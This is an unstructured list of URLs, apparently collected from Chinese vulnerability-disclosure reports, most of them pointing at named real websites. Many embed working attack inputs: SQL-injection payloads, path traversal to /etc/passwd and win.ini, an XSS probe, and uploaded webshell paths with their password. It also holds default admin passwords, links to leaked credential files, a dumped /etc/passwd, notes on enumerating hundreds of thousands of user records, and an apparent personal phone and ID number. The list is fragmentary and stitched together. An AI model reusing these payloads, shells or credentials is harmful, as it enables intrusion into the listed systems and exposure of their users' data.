https://github.com/Jashion/YAE-sync/blob/516d00068a4a0972a962888904bffa1e903a6101/conf/topo-dev.json http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/win.ini http://pay.51wan.com/index.php?action=usercheckpage&control=index&game=%E6%88%98%E5%A4%A9%E5%A0%82&module=payment&serverid=16805&time=1447144687765&username=e http://malanlan.chinawutong.com/ashx/WTHandler.ashx?action=getappraise&id=1348093&type=111 http://m.zhcw.com/ucenter/login.jsp,中彩网登陆处。 http://m.zhcw.com/clienth5.do?transactionType=1004&userId=76379&accountName=15852335087&src=0000100001%7C6000003060,此处可以获取账号信息,包含真实姓名、电话号码、身份证号、银行卡号、邮箱、用户名、用户ID等等,通过遍历userID,可以越权获取其它用户信息,这里将第一位从0到999进行简单fuzz,发现共46个段存在用户,即可获得40多万用户信息。 http://api.codoon.com/api/get_good_post http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217 http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217 http://m.zhcw.com/port/get_video.jsp?keywords=1*/&random=0.5842112696263939 http://**.**.**.**/bugs/wooyun-2015-0144624 http://**.**.**.**/TextNewsList.aspx?NTID=11%20%u0062%u0052%u0065%u0058%u003D%u0036%u0033%u0038%u0030%u0020%u0041%u004E%u0044%u0020%u0031%u003D%u0031%u0020%u0055%u004E%u0049%u004F%u004E%u0020%u0041%u004C%u004C%u0020%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0031%u002C%u0032%u002C%u0033%u002C%u0074%u0061%u0062%u006C%u0065%u005F%u006E%u0061%u006D%u0065%u0020%u0046%u0052%u004F%u004D%u0020%u0069%u006E%u0066%u006F%u0072%u006D%u0061%u0074%u0069%u006F%u006E%u005F%u0073%u0063%u0068%u0065%u006D%u0061%u002E%u0074%u0061%u0062%u006C%u0065%u0073%u0020%u0057%u0048%u0045%u0052%u0045%u0020%u0032%u003E%u0031%u002D%u002D%u0020%u002E%u002E%u002F%u002E%u002E%u002F%u002E%u002E%u002F%u0065%u0074%u0063%u002F%u0070%u0061%u0073%u0073%u0077%u0064 http://a.ikangdental.com/log/2015-04-20.txt http://api.110monitor.com/alarm/ListAlarm.jsp?UPYOO_TOKEN=45f23f9e-b989-417f-b658-xxxxxx http://img1.allfang.com/upload.do?method=toUpload&formName=frmSend&inputName=file&contentType=knowledge_file&fileType=FILE&nameType=CURRENT&ifZoom=false&upLoadContext=&uploadIpName=file_uploadIp&cityName=newtj&returnIP=localhost:8080/fileupload_2014 http://**.**.**.**/EpointBigFileUpload http://**.**.**.**/EpointBigFileUpload/EpointBigFileUpLoad.rar http://**.**.**.**/EpointBigFileUpload/EpointBigFileUpLoad22.rar http://**.**.**.**/EpointBigFileUpload/FCKFile/EpointFileServer.asmx http://m.zhcw.com/ http://m.zhcw.com/clienth5.do;jsessionid=F0ADB71B059AB59D0F4E87DD22FDD782.h5_224?checkCode=&accountName=手机号&transactionType=300612&tt=0.5841984870484274&src=0000100001|6000003060 http://**.**.**.**/ciecol/web/kcjs_detail.jsp?id=28 http://api.uyan.cc/?url=http://q.com&title=tt&mode=../../../../../etc/rc.d/.././rc.local%00f.html http://m.octmami.com/user/login http://**.**.**.**/index.php?app=goods&id=10970 http://**.**.**.**/index.php?app=goods&id=10970 https://www.xmjr.com/user/messageDetail?messageId=13580 http://**.**.**.**/cmbisc/news/content.aspx?id=2583321 http://**.**.**.**/cmbisc/news/content.aspx?id=2583321 http://**.**.**.**/login.jsp http://**.**.**.**/upfiles/+木马上传之后分配的名字 http://**.**.**.**/upfiles/20151110163331680.jsp密码:pass http://**.**.**.**/login.php http://**.**.**.**/index.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/login.php http://**.**.**.**/login.php http://**.**.**.**/login.php http://**.**.**.**:8787/interIndex.do?method=jubao http://**.**.**.**/report/admin/Login.aspx。 http://**.**.**.**/ucoa/weixin/weixin_set.aspx?userOpenId=oFYhduFPPN95g658RLeT9L7SQmO4 http://tc.changhong.com/search.aspx?key=1 http://www.huajinsc.cn/postsystem http://mall.998.com/passport-login.html商城登录接口,有验证码限制 http://vpn.ppm.cn/ http://**.**.**.**/bugs/wooyun-2010-089595 http://**.**.**.**/ http://**.**.**.**//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER url:http://**.**.**.**/Shop/product.html?can[0]=90 http://**.**.**.**:8001/phrs/Society/SocietyMain.html http://member.360hitao.com https://**.**.**.** https://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B http://221.8.57.106/ http://**.**.**.**/office http://**.**.**.**/WorldClient.dll?View=Logout http://**.**.**.**/HumanResources/SearchJob.aspx http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://tc.changhong.com/certs/detail.aspx?id=1 http://t.cn/RUUNjzh http://antirez.com/news/96 http://www.huozhan.com/SupplierMessageAction_showSupplierBasicMessage.do?supplercode=010005 http://www.lihaodai.com/dyweb/dythemes/diyou/css/xsd/xsshow.php?xsRealName=admin(参数xsRealName存在注入) http://admin.pay.weibo.com/admin/index.php http://boss.idccun.com/ http://www.baixingbao518.com http://crm.midea.com.cn/downexcel/ http://wma.ejoy.sinopec.com/wma//htmlLogin/o2oOneCoupons.action redirect:http://www.baidu.com http://**.**.**.**/ http://api.110monitor.com/CrossDomainProxy?1=1&_workId=1447203777417-44251&UPYOO_TOKEN=e748b630-2e0a-485d-8c04-xxxxx&_url=http://api.110monitor.com/ucid//app/user?1=1&key=1&_search=false&nd=1447203777418&rows=20&page=1&sidx=&sord=asc http://**.**.**.** http://**.**.**.**/case_class.asp?id=2&Menu=ChildMenu1 http://**.**.**.**:8001/phrs/Society/SocietyMain.html http://**.**.**.**:8001/phrs/fileupload.jsp http://**.**.**.**:8001/phrs/servlet/downloadServlet?filename=/bea/user_projects/domains/hrrs/Attachment/null/01.jpg http://**.**.**.**:8001/phrs/servlet/downloadServlet?filename=/etc/passwd http://**.**.**.**:8001/phrs/servlet/downloadServlet?filename=/etc/hosts http://www.mangocity.com/mangob2b/loginOperateAciton!loginMethod.action http://**.**.**.**/sygl/default.asp http://**.**.**.**/Self/CheckCity.aspx?province= http://www.openfind.com/taiwan/casestudy.php?id=1996 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/up.aspx http://jp.ch.com/jp.ch.com.zip http://**.**.**.**/register.jspx http://**.**.**.** http://**.**.**.** http://**.**.**.**/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=39 http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null http://**.**.**.**/pages.asp?id=56 http://**.**.**.**/guoji/Admin_Index.asp http://www.dianxiaoyi.com/ http://**.**.**.**/点击图中标识链接 http://info.315.com.cn:80/ http://www.haodai.com/zixun/k_1*/ act.wildstar.ztgame.com/news_comment/get.php?id=&type=evolve04 http://www.agehui.cn/ http://njumaths.nju.edu.cn/oa/main/menupage/viewmenu.jsp?txt_type2=10 http://njumaths.nju.edu.cn/oa/main/menupage/viewmenu.jsp?txt_type2=10 http://www.51zxw.net/gp_buy.aspx?pid=526 http://218.249.220.18/ http://www.sinochemjiangsu.com/login.aspx http://fenxiao.lvmama.com/ http://fenxiao.lvmama.com/getpass.jsp处,通过输入正确的手机号码泄露用户名; http://fenxiao.lvmama.com/b2b/prod_list.jsp,说明进行了过滤。经过试验,发现“/”除号没进行过滤,除号下if语句进行了过滤,"case http://vip.zjqq.mobi/index.php/vote/voteList?id=271 port:6379 http://antirez.com/news/96 http://cx.saicmotor.com/uc_server/ http://www.colourlife.com/community?name=* http://li.yonyou.com/test.aspx http://h.yonyou.com/ http://hr.yonyou.com/ http://q.yonyou.com/ http://1.202.242.116/ECHT/ http://jwc.nau.edu.cn/ http://sso.nau.edu.cn/sso/login?service=http%3A%2F%2Fims.nau.edu.cn%2F http://ims.nau.edu.cn/findpassword http://**.**.**.**/Policeinterface/user!register.action http://**.**.**.**/Policeserver/download/download_icon.png http://**.**.**.**/Policeinterface/shell.jsp http://**.**.**.**/Policeinterface/caa1.jsp http://**.**.**.**/FlowRedPacket!sendFlowRedPacket.action http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket.action&password=123456&chk=&loginType=0&chkType=on http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket!sendFlowRedPacket.action?packetAmount%3d1%26sendFlowValue%3d1%26mobile%3d18600827452%26captcha_sj%3d123456&password=123456&chk=&loginType=0&chkType=on http://t.**.**.**.**/cu0afe),还是利用到了backurl http://t.**.**.**.**/xCT7dh http://t.**.**.**.**/qHDsvb http://t.**.**.**.**/dj7Z2m http://t.**.**.**.**/bxByy0 http://t.**.**.**.**/ZELNPs http://t.**.**.**.**/Uo1PKS http://t.**.**.**.**/QFHJqP http://t.**.**.**.**/QCwmof http://t.**.**.**.**/Q5BGfA http://t.**.**.**.**/Q0QwZd http://t.**.**.**.**/Pcl18r http://t.**.**.**.**/NC2RVd http://t.**.**.**.**/KNxPLW http://t.**.**.**.**/KLUVwD http://t.**.**.**.**/HekWzz http://t.**.**.**.**/G0Qjqc http://t.**.**.**.**/9OV0Mw http://t.**.**.**.**/83RNLi http://t.**.**.**.**/5XV5vT http://t.**.**.**.**/2F8kqZ http://**.**.**.**/bugs/wooyun-2014-076547 http://180.153.223.220/seeyon/ http://180.153.223.220/seeyon/logs/ctp.log http://180.153.223.220/seeyon/logs/uc.log http://**.**.**.**/Person/grfjsc/u.asp http://**.**.**.**/login!findRoleByUserlogin.action存在命令执行漏洞 http://**.**.**.**/common/adminLogin.action http://**.**.**.**/one8.jsp http://**.**.**.**/member/member.php?channelid=27&username=a http://**.**.**.**/uploadfile/bk.tar.gz http://**.**.**.**/sys/sys_tbl_destroy.php、http://**.**.**.**/bo.php等等~~ http://member.99114.com/view/findpassword/passwordForm.jsp?siteId=1 http://**.**.**.**/ http://**.**.**.**/buildinginfo.php?id=863 http://www.darryring.com/nAPI/AddressInfo.ashx?action=getbyid&id=81691 http://www.zrtg.com http://122.225.200.174/ http://**.**.**.**/swjsyjzx/admin_aspcms/login.asp shell:http://**.**.**.**/Skins/root.asp http://www.xjair.com http://www.xjair.com/articlelist.aspx?lmid=201111241132339582 http://www.xjair.com/article.aspx?id=201511021252236147 http://www.xjair.com/article.aspx?id=201510281636048110 http://www.xjair.com/article.aspx?id=201510221417206230 http://www.xjair.com/article.aspx?id=201510221416398861 http://www.xjair.com/article.aspx?id=201509101129137719 http://www.xjair.com/article.aspx?id=201509101125387361 http://www.xjair.com/article.aspx?id=201509101125387361 http://sso.me.csair.com/rs-bin/rightsite.dll/vsi3.htm http://e.tpyzq.com/login/Login.jsp?logintype=1 www.fengniao.com http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/zgh/socialAdmin/ http://**.**.**.**/jyxc.asp?id=4036 http://**.**.**.**/jyxc.asp?id=4036” http://gm.gome.com.cn/Admin http://www.ownar.com/member.php?id=24 http://**.**.**.**/qiuchang.php?id=27 http://**.**.**.**/curriculum_show.aspx?id=141 http://**.**.**.**/newsinfo.asp?flowNo=1213 http://**.**.**.**/admin/login.asp http://**.**.**.**/ http://appservice.lenovomm.com/cacti/ http://124.248.34.227/detail.html?pid=10077208 http://**.**.**.**/club/m_detail.aspx?id= http://**.**.**.**/sys_msg/msgsh.aspx?con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81 http://**.**.**.**/sys_msg/msgsh.aspx?con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81 http://**.**.**.**/hc_view.asp?catid=88 http://**.**.**.**/page_view.asp?catid=150&N_types=1 http://**.**.**.**/page2.asp?catid=122&N_types=1 http://**.**.**.**/zt1a2_view.asp?id=78&M_id=6 http://**.**.**.**/page2_view.asp?N_id=259&N_types=4&catid=140 http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712 http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712 http://**.**.**.**/case_enterprise.html http://**.**.**.**/case_college.html http://**.**.**.**/case_government.html http://**.**.**.**/ http://www.emaotai.cn:90/zyd/ www.emaotai.cn:90/zyd/Member/JlrList.aspx?khbh=20130523000007 http://**.**.**.**/store/FTP_Accounts.txt http://api.fengniao.com/app_ipad/news_list.php http://interactive.huanqiu.com/.svn/entries http://api.huanqiu.com/info.php来送温暖了 http://**.**.**.**/bugs/wooyun-2015-0132163 http://**.**.**.**/oa/ http://**.**.**.**/oa/indexlist.aspx?type= http://**.**.**.**/ http://**.**.**.**/product.asp?proId=35 http://**.**.**.**/findgov http://**.**.**.**/findgov http://mobile.ztgame.com/mobile/index.php https://mobile.ztgame.com http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7 http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://admin.ixingmei.com/index.php?r=site/index http://q.yoger.com.cn/diaryinfo.php?did=86&uid=200782 http://q.yoger.com.cn/diaryinfo.php?did=5501&uid=16262365 https://112.124.211.176/.git/ http://**.**.**.**/pages/portal/index.jsp www.woshidai.com http://**.**.**.**:9111 http://**.**.**.**/WebLoginAction.do?cmd=logout http://mcti.xmu.edu.cn:80/records_player.php?id=1 http://mcti.xmu.edu.cn:80/teacher_info.php?id=2 http://mcti.xmu.edu.cn:80/news_browser.php?id=1 http://mcti.xmu.edu.cn:80/ http://www.emaotai.cn:90/zyd/LoginTo.aspx http://www.emaotai.cn:90/zyd/Config/SpjgEdit.aspx?spbh=696&Op=&ReturnPage=~/Config/SpjgList.aspx http://www.emaotai.cn:90/zyd/Config/SpEdit.aspx?spbh=696 http://www.nuoxinvc.com/ www.nuoxinvc.com http://**.**.**.**/page/info.jsp?id=111536 http://**.**.**.**/group_Iframe.asp?id=5 http://tams.youxinpai.com/,如图所示: http://tams.youxinpai.com http://caig.homelink.com.cn/ http://91up.com/权限控制不严,是否付费只靠前端JS控制,通过http抓包分析可获取大量收费课程地址。 http://118.112.186.175:2222/ http://118.112.186.175:2222/super/index.php?c=welcome&m=index http://118.112.186.175:2222/super/index.php?c=mail_show&m=show_email&id=44581 http://118.112.186.175:2222/super/index.php?c=mail_show&m=download_attachments&attachments_id=3215 http://118.112.186.175:2222/super/index.php?c=my_equipment&m=index http://**.**.**.**/download.aspx?cat_code=Head http://**.**.**.**:8080/cgi-bin/test-cgi http://**.**.**.**:8080/cgi-bin/test-cgi http://mail.**.**.**.** http://**.**.**.**/bugs/wooyun-2014-076547 http://ctags.sourceforge.net http://3g.game.letv.com/zabbix/ http://p.game.letv.com/zabbix/ http://**.**.**.** http://www.open.com.cn/usercenter/feedback.html http://file.mt.sogou.com/admin.html http://ysj.medlive.cn/ http://cheer.medlive.cn/ http://case.medlive.cn/ http://stat.medlive.cn/login.do http://info.tcl.com/ https://**.**.**.**/account/password_reset.tmpl?PASSWORD=mp4ybNy&EMAIL_ADDRESS=XXX http://wx.zhcw.com/port/get_video.jsp?keywords=111&random=0.6499213096685708 http://ehome.zte.com.cn/index.php?app=goods&id=1829/*!AND*/1=1 http://ehome.zte.com.cn/index.php?app=search&cate_id=164/*!AND*/1=1 http://ehome.zte.com.cn/index.php?app=goods&id=1829/*!AND*/1=2 http://ehome.zte.com.cn/index.php?app=search&cate_id=164/*!AND*/1=2 http://ehome.zte.com.cn/index.php?app=goods&id=1829 http://tc.changhong.com/inspection/jc.aspx?type=1111 http://tc.changhong.com/inspection/inspect3.aspx?id=11 http://univ1.zte.com.cn/XsExam/Application/ExamManager/ShowExam_Paper.aspx?seqno=2888579&status=5&ExamId=113167&PaperId=52325&StudentId=20060900063376&ExamName=%E5%85%A8%E5%91%98QCC%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E5%9F%B9%E8%AE%AD%E8%80%83%E8%AF%95&StudentName=%E8%93%9D%E5%86%AC%E8%8B%B1 http://mail.damai.cn http://**.**.**.**/wscx/ http://**.**.**.**/jiaoshizhaopin/liaoning/chaoyangjiaoshizhaopinwan/2014-0825-22505.html http://**.**.**.**/tic_sstf_site/QueryCont_siteSearchList.action?siteId=402882db4a610351014a610351e90000&cateId=all&queryKeyword=1 http://**.**.**.**:807/TicketBook/TicketPaySend.aspx?lb_bookNo=942562&lb_Date=2015-11-14%E3%80%8007%3a30&lb_OwnerStation=%E5%9F%8E%E8%A5%BF%E5%AE%A2%E8%BF%90%E7%AB%99&lb_ArriveName=%E9%BA%9F%E6%B8%B8&lb_TicketPrice=38.50&lb_sumPrice=11.5000&lb_StFee=3.0000&lb_Optime=2015-11-13+11%3a39%3a49&lb_sumPageNum=1&lb_BaoXianTypeName=%E4%B9%98%E8%BD%A6%E6%84%8F%E5%A4%96%E9%99%A9&lb_BaoXianCompName=%E9%99%95%E8%A5%BF%E6%B3%B0%E5%BA%B7%E5%85%BB%E8%80%81&lb_BaoXianInfos=%E5%89%8C%E6%96%B9%E5%9C%86%2c18192351965%2c610329198905081159%2c0%2c1%2c0&lb_BaoXianFreeMSG=%E4%B8%8D%E8%B5%A0%E9%80%81%E5%85%B6%E5%AE%83%E4%BF%9D%E9%99%A9&lb_BaoXianFee=0.0000&lb_BaoXiancount=1&lb_FreeMSG=%E6%97%A0%E4%BC%98%E6%83%A0%E6%B4%BB%E5%8A%A8&lb_Discountprice=0.0000&lb_FreeTypeID=0&lb_FreeBaoXianType=0&lb_Contact=%E5%89%8C%E6%96%B9%E5%9C%86&lb_tel=181923519xx&lb_idcard=xxx http://mba.xmu.edu.cn:80/account/get_email?email=-1 http://**.**.**.**/test.php http://space.qian88.com.cn/space.php?uid=272104&do=wall&view=me http://**.**.**.**/sydwzk/exam/PaperNoPrint.jsp?memberid=51350 http://**.**.**.**/sydwzk/exam/PaperNoPrint.jsp?memberid=51350 com:6379 http://**.**.**.** http://**.**.**.**:89 http://**.**.**.**/searcher.aspx?id=a http://ydm.iyuedan.com/manage/ http://www.fangte.com/ticket/ http://**.**.**.**/cms/jsp/culture/CULPINFO_selectall.jsp?pageno=1 http://**.**.**.**/ http://222.22.255.106:8089/ggjs/zdzx/dztj.jsp?servertype=&&kzh=smk0181177 http://**.**.**.**/tools/.svn/entries http://**.**.**.**/tools/test.xml http://woodscience.csuft.edu.cn/hudong/Topic.aspx?id=4 http://mba.fenxi.com/index.php?r=user/setup/sites https://github.com/callmebmf/crc360.cn/blob/53c8ddc4f0dca51757599f624ae2fca913b0332e/app/config/mail.php http://**.**.**.**/vsadmin/ctrl/member/members.php http://**.**.**.**/vsadmin/ctrl/member/member-edit.php?seller=&&uid=91&&type=pf http://**.**.**.**:81/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:81/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:81/weaver/weaver.email.FileDownloadLocation?fileid=1*&download=1 http://**.**.**.**:8012/userlist.php http://**.**.**.**/fagui_cont.asp?news_id=15711 http://**.**.**.**/fagui_cont.asp?news_id=15711 http://**.**.**.**/jyxt/loginzphdwzpxx.do?dwloginid=cjzqcq http://**.**.**.**/jyxt/loginzphdwzpxx.do?dwloginid=cjzqcq http://**.**.**.**/Topic/Show.aspx?id=135641&tid=208 http://**.**.**.**/Topic/Show.aspx?id=135641&tid=208 http://supports.jiaju.sina.com.cn/manage/index.php?mod=login&act=show http://supports.jiaju.sina.com.cn/manage/index.php?mod=feedback&act=reply&status=1 http://go.sogou.com/hotel/WEB-INF/web.xml http://go.sogou.com/zt/WEB-INF/web.xml http://go.sogou.com/tejia/WEB-INF/web.xml http://go.sogou.com/plane/WEB-INF/web.xml http://admin.yixun5866.com/admlogin.aspx,这个是管理后台。 http://**.**.**.**/general/vmeet/wbUpload.php?fileName=test.php+ http://**.**.**.**/general/vmeet/wbUpload/test.php http://jpkc.nwpu.edu.cn/jp2005/02/wljx/wlkc/12345.files/lyb/index.asp?action=login http://jpkc.nwpu.edu.cn/jp2007/17/admin/index.asp http://jpkc.nwpu.edu.cn/jp2005/19/jsbks/jsbks_login.asp http://jpkc.nwpu.edu.cn/jp2007/11/admin.asp http://jpkc.nwpu.edu.cn/dzjc/dianzijs/admin.asp http://jpkc.nwpu.edu.cn/jp2005/32/Experiment/sylogin.asp http://jpkc.nwpu.edu.cn/jp2005/16/Exam_left.asp http://jpkc.nwpu.edu.cn/jp2005/32/Exam/zxcp1.asp http://dealer.youxinpai.com/ https://www.wooyun.org/bugs/wooyun-2014-057448 http://www.mafengwo.cn/postal/ticket.php www.mafengwo.cn http://**.**.**.**/manage/contractrecord/lpb1?fwnm=2464411 http://edm.300.cn/ http://news.zrtg.com:8080/exchange/externaldoc/queryExternaldoc.do http://221.8.39.98:5555/Login.aspx http://lib.henannu.edu.cn http://service.cheshi.com/complain/complain_list.php?pid=3 http://service.cheshi.com/complain/complain_list.php?pid=3/**/or http://**.**.**.**/c6/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**:81/c6/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**/c6/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://**.**.**.**:81/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://mail.faw.com.cn/ http://coog.cnooc.com.cn/oa/output.ashx http://bbs.51credit.com/forum.php?mod=viewthread&tid=2315957 http://www.qian88.com/findLoginPwdFirst.html http://**.**.**.**:80/buynow_where1.asp?lang=en&id=10 http://**.**.**.**/cgi-bin/ip?cmd=logout http://**.**.**.**/search.php?ip=%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://**.**.**.** http://115.159.22.106:8080/ http://oa.tianjimedia.com/ http://oa.tianjimedia.com/yyoa//checkWaitdo.jsp?userID=1 http://i5.tietuku.com/1e5c211d3c5e31b2.png http://i12.tietuku.com/db20af050c4329a9.png https://github.com/cckjs/young_tools/blob/8de3c1c04a5178c8ffe9c6a574833bca3e41ea08/tools-email/src/main/resources/mail.properties https://github.com/hutao1004/yintt/blob/df629119ccf0cf9443cfa35c69eb269bd91aa3de/Webconfig/msgconfig.php http://58.60.63.23/landing.action http://www.g-bos.cn/system/userPurview/toLogin password:123456 http://jx.g-bos.cn/system/userPurview/toLogin username:test password:123456 http://gc.g-bos.cn/system/userPurview/login username:admin password:123456 http://gamemanager.uqee.com/ https://github.com/jklmnlkevin/daxia-jeasyui/blob/f1ac50419bf59d40667cae44fcc257a51d5d1ef8/src/main/resources/mail.properties http://**.**.**.** http://3g.emaotai.cn/ http://www.emaotai.cn/wapshop/Login.aspx?returnUrl=http://www.emaotai.cn/wapshop/MemberCenter.aspx http://**.**.**.** http://**.**.**.** https://github.com/fanzq/nutz_httl/blob/9c1806d5ee5ee84c01b0102a526a9cbee20deb27/nuzt_fan/src/main/resources/custom/mail.properties https://sso.youshang.com/sso/userAuthnAction.do#无限制撞库 http://zone.wooyun.org/content/23905。于是盛大漫游之路开始~首先是其中的一个站点http://qa.act.sdo.com:7000居然存在jenkins这个服务.然后利用反弹的脚本直接就得到了cmdshell https://code.google.com/p/studentofficedocs/source/browse/trunk/%E5%AD%A6%E9%99%A2%E7%BE%A4%E5%8F%91%E7%9F%AD%E4%BF%A1%E7%94%A8%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81.txt?r=9 http://219.232.237.76/zabbix root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin mysql:x:500:501::/home/mysql:/bin/false zabbix:x:501:502::/home/zabbix:/bin/false http://www.culiu.org/.git/config org:shop/culiuorg.git http://xingzuo.chuchujie.com/ http://erp.emaotai.cn/b2b/ele-business/salesman/index.asp http://**.**.**.**/) http://xxxx/emap/bitmap/bitMap_delPicFromDisk.action http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp?operator=**.**.**.**:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://www.culiu.org/admin/index.php/login/check/time-1446192228-ajax-true http://scm.ttkuaiche.com/tt-scm/page/index.do http://ask.07073.com/search/?q=1 http://**.**.**.**/Service_show.asp?ID=27 http://m.jzjt.com/jzjt.sql http://changba.com/s/VdQUyfuTAw95sGks8pUbjg?&code=Kxhsv6044ik https://**.**.**.**/bugs/wooyun-2015-0152055中影响的这些站登陆之后, http://cmncu.minmetals.com.cn http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html https://github.com/yb989/infcenter/blob/872d63dbd49b54aced249fc0eb9cd20ef24d6ca7/new_infcenter/.svn/pristine/80/8085974cb049d6c9438e59c0a773c321b11e7f08.svn-base https://www.jinxinp2p.com/image.do\?uri\=../../../../../../../../../../etc/passwd http://60.28.205.210/ https://github.com/jsy593/bheticketview/blob/1ee1e2bde964d185fea63f535469f0da2f2d0ed8/src/com/bhe/util/MailBean.java http://www.htsec.com/ChannelHome/index.shtml)存在SQL注入一枚,DBA权限,可拖库。 https://github.com/1649865412/ToolConstant/blob/6508df3210cbb8fc47242a12fd03cf2dafcf0a9b/text/src/mail/EmailDemo.java www.emaotai.cn:90 http://alexa.admin5.com/ftp.zip www.gzklnx.cn http://www.emaotai.cn:90/zyd/ http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2 http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650 http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18 http://**.**.**.**/zc/ http://cp.super8.com.cn/api/region/getlandmarkbymaintypeid?cityCode=-1 http://**.**.**.**/servicehome/kmview.aspx?postid=ZS20131231026 http://**.**.**.**/AppWeb/BuDing/BuDingGJCX.aspx http://www.bocommtrust.com/ http://**.**.**.**/index.asp http://**.**.**.**/upload_flash.asp http://edt.mostgov.cn http://**.**.**.**:9090/live/p.do http://**.**.**.**:9090//live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd http://e.huanqiu.com/hqad/view?pid=216&cvid=636&mid=78&tag=0 http://baike.baidu.com/link?url=pevH3Xt2XmklC2Uc6Nuk1E85KtWdyI717e6Wy1xEPOd_InJGolfdhNfAXpMJ8mFX9dGY5kpLu9-ddtQRPPyByThSoFgDFS9Gal01-9FaRjG http://**.**.**.**/course_center/index/homepage/preview.jsp?id=df72f4f0-8993-4e65-93b2-888ce142c93a&t=news&0.30376001982949674 www.ledaosw.com http://www.jinmajia.com/WEB-INF/web.xml https://www.wooyun.org/bugs/wooyun-2015-0143209 